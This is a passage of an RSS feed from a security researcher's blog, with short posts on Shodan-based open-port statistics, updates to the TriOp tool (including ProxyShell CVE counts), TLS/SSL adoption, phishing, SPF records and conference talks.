&lt;p&gt;One additional point that deserves a mention is that Shodan has recently opened access to a new service called &lt;a href=&#34;https://trends.shodan.io/&#34;&gt;Shodan Trends&lt;/a&gt;, which enables users to generate trend charts for (probably) arbitrary Shodan queries. Although these charts are based on monthly averages and are therefore not as precise as charts generated from data collected on a daily basis using TriOp, they can certainly provide one with an interesting look at long-term trends. If you therefore only require general information about trends related to one or more Shodan queries and don&amp;rsquo;t need a detailed view at how things change on a day-to-day basis, then this service might be a viable alternative to TriOp for you&amp;hellip;&lt;/p&gt;
&lt;p&gt;As alway, you may download the latest version of TriOp from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>Open ports statistics for Q3 2021</title>
        <link>https://untrustednetwork.net/en/2021/10/01/open_ports_q3_2021/</link>
        <pubDate>Fri, 01 Oct 2021 15:00:00 +0200</pubDate>
        
        <atom:modified>Fri, 01 Oct 2021 15:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/10/01/open_ports_q3_2021/</guid>
        <description>Only the last three months remain until the end of 2021, which means it&amp;rsquo;s time for a look at how the internet as a whole changed in the third quarter of the year.
As always, the data, on which the following charts are based, have been gathered using Shodan. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the first post with quarterly statistics.</description>
        <content:encoded>&lt;p&gt;Only the last three months remain until the end of 2021, which means it&amp;rsquo;s time for a look at how the internet as a whole changed in the third quarter of the year.&lt;/p&gt;
&lt;p&gt;As always, the data, on which the following charts are based, have been gathered using &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;first post with quarterly statistics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Should you be interested in the port situation in the Czech Republic, you may find corresponding charts &lt;a href=&#34;https://untrustednetwork.net/cs/2021/10/01/open_ports_q3_2021/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefwebweba&#34;&gt;&lt;a href=&#34;#web&#34;&gt;Web&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls13&#34;&gt;TLS 1.3 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls12&#34;&gt;TLS 1.2 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls11&#34;&gt;TLS 1.1 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls10&#34;&gt;TLS 1.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefemaile-maila&#34;&gt;&lt;a href=&#34;#email&#34;&gt;E-mail&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreftlsssltlsa&#34;&gt;&lt;a href=&#34;#tls&#34;&gt;SSL/TLS&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#tls13&#34;&gt;TLS 1.3 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls12&#34;&gt;TLS 1.2 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls11&#34;&gt;TLS 1.1 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls10&#34;&gt;TLS 1.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreficsindustrial-control-systems-icsa&#34;&gt;&lt;a href=&#34;#ics&#34;&gt;Industrial Control Systems (ICS)&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ics_all&#34;&gt;All ICS protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls13&#34;&gt;TLS 1.3 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/htls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls12&#34;&gt;TLS 1.2 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/htls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls11&#34;&gt;TLS 1.1 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/htls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls10&#34;&gt;TLS 1.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/htls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/hssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/hssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;email&#34;&gt;E-mail&lt;/h2&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;tls&#34;&gt;SSL/TLS&lt;/h2&gt;
&lt;h4 id=&#34;tls13&#34;&gt;TLS 1.3 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/tls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls12&#34;&gt;TLS 1.2 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/tls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls11&#34;&gt;TLS 1.1 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/tls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls10&#34;&gt;TLS 1.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/tls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/ssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/ssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;ics&#34;&gt;Industrial Control Systems&lt;/h2&gt;
&lt;h4 id=&#34;ics_all&#34;&gt;All ICS protocols&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/ics.png&#34; alt=&#34;All ICS protocols&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q3/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/ports/2021/q3/htls13.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>Interview - ECSC 2021</title>
        <link>https://untrustednetwork.net/en/2021/09/30/ecsc_2021/</link>
        <pubDate>Thu, 30 Sep 2021 21:10:00 +0200</pubDate>
        
        <atom:modified>Thu, 30 Sep 2021 21:10:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/09/30/ecsc_2021/</guid>
        <description>Prague is currently hosting this year&amp;rsquo;s European Cyber Security Challenge - an international security competition for teams of young talents from different European countries. Since I am the author of one of the practical challenges that make up the competition and ALEF is one of its sponsors, I was asked for a short interview by the competition&amp;rsquo;s organizers in the run up to the Challenge itself. The resulting video was published on Youtube today.</description>
        <content:encoded>&lt;p&gt;Prague is currently hosting this year&amp;rsquo;s European Cyber Security Challenge - an international security competition for teams of young talents from different European countries. Since I am the author of one of the practical challenges that make up the competition and ALEF is one of its sponsors, I was asked for a short interview by the competition&amp;rsquo;s organizers in the run up to the Challenge itself. The resulting video was published on &lt;a href=&#34;https://www.youtube.com/watch?v=jPhy3VgttEU&#34;&gt;Youtube&lt;/a&gt; today. I think it looks fairly good, but you can judge the result for yourself&amp;hellip;&lt;/p&gt;
&lt;p align=&#34;center&#34;&gt;&lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/jPhy3VgttEU&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>ALEF</category>
            
          
        
        
          
            
              <category>Talks</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - TLS 1.3 and SSL - the current state of affairs</title>
        <link>https://untrustednetwork.net/en/2021/09/28/ssl_tls/</link>
        <pubDate>Tue, 28 Sep 2021 11:20:00 +0200</pubDate>
        
        <atom:modified>Tue, 28 Sep 2021 11:20:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/09/28/ssl_tls/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the current state of adoption of TLS 1.3 and disposal of SSL 2.0 and 3.0&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27882&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the current state of adoption of TLS 1.3 and disposal of SSL 2.0 and 3.0&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>SSL</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing 101: why depend on one suspicious message subject when you can use many?</title>
        <link>https://untrustednetwork.net/en/2021/09/16/phishing-multiple-subjects/</link>
        <pubDate>Thu, 16 Sep 2021 09:10:00 +0200</pubDate>
        
        <atom:modified>Thu, 16 Sep 2021 09:10:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/09/16/phishing-multiple-subjects/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing that tried to use multiple suspicious message subjects to lure the recipient to a phishing site&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27842&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing that tried to use multiple suspicious message subjects to lure the recipient to a phishing site&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Presentation from TF-CSIRT meeting - How TLS 1.3 adoption (and disposal of SSL) is going</title>
        <link>https://untrustednetwork.net/en/2021/09/14/tf-csirt_64/</link>
        <pubDate>Tue, 14 Sep 2021 19:00:00 +0200</pubDate>
        
        <atom:modified>Tue, 14 Sep 2021 19:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/09/14/tf-csirt_64/</guid>
        <description>64th meeting of the TF-CSIRT community took place today. I&amp;rsquo;ve had the pleasure to contribute to it with a short presentation about the current state of adoption of TLS 1.3 and continued use of SSL protocols. Although I usually don&amp;rsquo;t mention presentations I&amp;rsquo;ve prepared for TF-CSIRT meetings here, I&amp;rsquo;ve decided to make an exception for this one, since I believe that it might be worth looking at even without the accompanying commentary.</description>
        <content:encoded>&lt;p&gt;64th meeting of the &lt;a href=&#34;https://tf-csirt.org/&#34;&gt;TF-CSIRT&lt;/a&gt; community took place today.  I&amp;rsquo;ve had the pleasure to contribute to it with a short presentation about the current state of adoption of TLS 1.3 and continued use of SSL protocols. Although I usually don&amp;rsquo;t mention presentations I&amp;rsquo;ve prepared for TF-CSIRT meetings here, I&amp;rsquo;ve decided to make an exception for this one, since I believe that it might be worth looking at even without the accompanying commentary. If you&amp;rsquo;d like to take a look at it, you may find it (along with several other presentations) on &lt;a href=&#34;https://tf-csirt.org/tf-csirt/meetings/64th/&#34;&gt;this link&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>ALEF CSIRT</category>
            
          
        
        
          
            
              <category>Talks</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - There may be (many) more SPF records than we might expect</title>
        <link>https://untrustednetwork.net/en/2021/08/25/spf/</link>
        <pubDate>Wed, 25 Aug 2021 11:55:00 +0200</pubDate>
        
        <atom:modified>Wed, 25 Aug 2021 11:55:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/08/25/spf/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the surprisingly high number of SPF records set for domains in the CZ TLD&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27786&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the surprisingly high number of SPF records set for domains in the CZ TLD&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SPF</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>TriOp update - version 1.3</title>
        <link>https://untrustednetwork.net/en/2021/08/12/triop-update-version-1.3/</link>
        <pubDate>Thu, 12 Aug 2021 17:25:00 +0200</pubDate>
        
        <atom:modified>Thu, 12 Aug 2021 17:25:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/08/12/triop-update-version-1.3/</guid>
        <description>I’ve published version 1.3 of TriOp today. The only change in this version is the addition of vulnerabilities used in the ProxyShell attack (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) to the relevant search list.
Chaining of the vulnerabilities in question may lead to an unauthenticated RCE, so one would hope that given the recent media attention that was given to them, most organizations would patch them quickly. However, so far, the daily increases in number of their detections on Shodan seem to paint a slightly less optimistic picture&amp;hellip;</description>
        <content:encoded>&lt;p&gt;I’ve published version 1.3 of &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; today. The only change in this version is the addition of vulnerabilities used in the &lt;a href=&#34;https://isc.sans.edu/diary/27732&#34;&gt;ProxyShell attack&lt;/a&gt; (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) to the relevant search list.&lt;/p&gt;
&lt;p&gt;Chaining of the vulnerabilities in question may lead to an unauthenticated RCE, so one would hope that given the recent &lt;a href=&#34;https://www.securityweek.com/internet-scanned-microsoft-exchange-servers-vulnerable-proxyshell-attacks&#34;&gt;media attention&lt;/a&gt; that was given to them, most organizations would patch them quickly. However, so far, the daily increases in number of their detections on Shodan seem to paint a slightly less optimistic picture&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2021/triop13/proxyshell-210812.png&#34; alt=&#34;ProxyShell detections - August 9 to August 12, 2021&#34; style=&#34;width:700px; border:1px solid grey&#34;&gt;
&lt;br&gt;
&lt;p&gt;As alway, you may download the latest version of TriOp from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2021/triop13/proxyshell-210812.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - ProxyShell - how many Exchange servers are affected and where are they?</title>
        <link>https://untrustednetwork.net/en/2021/08/09/proxyshell/</link>
        <pubDate>Mon, 09 Aug 2021 12:25:00 +0200</pubDate>
        
        <atom:modified>Mon, 09 Aug 2021 12:25:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/08/09/proxyshell/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the number of Exchange serveres vulnerable to the ProxyShell attack&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/27732&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the number of Exchange serveres vulnerable to the ProxyShell attack&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Exchange</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>List of free online malware analysis sandboxes v1.7</title>
        <link>https://untrustednetwork.net/en/2021/08/04/sandboxes-1.7/</link>
        <pubDate>Wed, 04 Aug 2021 08:55:00 +0200</pubDate>
        
        <atom:modified>Wed, 04 Aug 2021 08:55:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/08/04/sandboxes-1.7/</guid>
        <description>Since the online malware sandbox landscape has changed somewhat over the last six months, I have updated my list of most useful sandboxes to reflect these changes. One improvement that deserves a special mention was a significant increase in number of supported operating systems by the Hatching Triage platform&amp;hellip;
